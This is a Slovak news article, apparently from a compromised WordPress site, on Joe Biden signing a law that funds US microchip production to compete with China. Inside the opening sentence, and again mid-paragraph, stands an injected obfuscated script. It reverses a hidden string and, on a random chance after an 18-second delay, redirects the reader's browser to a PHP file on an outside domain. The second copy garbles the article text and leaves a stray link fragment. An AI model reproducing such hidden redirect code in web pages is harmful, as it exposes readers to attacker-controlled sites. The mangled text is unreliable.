S trochou nadsádzky by sa dalo povedať, že prezident USA Joe Biden urobil krok "po<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>dobný Trumpovi". Podpísal zákon, ktorý výrazne zvýši výrobu čipov v USA.

Joe Biden dal zelenú podpore výroby mikročipov v USA. Chce zvýšiť konkurencieschopnosť voči Číne

S trochou nadsádzky by sa dalo povedať, že prezident USA Joe Biden urobil krok „podobný Trumpovi“. Podpísal zákon, ktorý výrazne zvýši výrobu čipov v Spojených štátoch s cieľom vytvoriť konkurenciu Číne.

Spojené štáty držia krok s Čínou

„Budúcnosť sa bude vyrábať v Amerike,“ vyhlásil súčasný šéf Bieleho domu po tom, ako podpísal podporu investícií do rozšírenia výrobných kapacít mikročipov. Na základe tohto zákona poskytne vláda americkým výrobcom čipov takmer 53 miliárd dolárov na zvýšenie ich výrobných kapacít.$mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobra-sprava-pre-kryptomeny/“ target=“_blank“ rel=“noopener“> Spojené štáty však nechcú konkurovať Číne len vo výrobe čipov, ale chcú s ňou držať krok aj vo vede a technológiách vo všeobecnosti.

Cieľom je zvýšiť investície do výroby čipov

Joe Biden pochválil americké spoločnosti, ktoré už investujú do výroby čipov, a vláda ich chce v tomto úsilí podporiť. Zatiaľ však nie je jasné, kedy americké ministerstvo obchodu vypracuje pravidlá, podľa ktorých sa budú rozdeľovať granty z uvedeného balíka peňazí. Najdôležitejšie je, ako dlho bude distribúcia trvať a kedy prinesie vládna podpora prvé ovocie. Cieľom podpory je však zvýšiť podiel USA na celosvetových investíciách do výroby čipov z dvoch na desať percent.

Jeden komentář

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *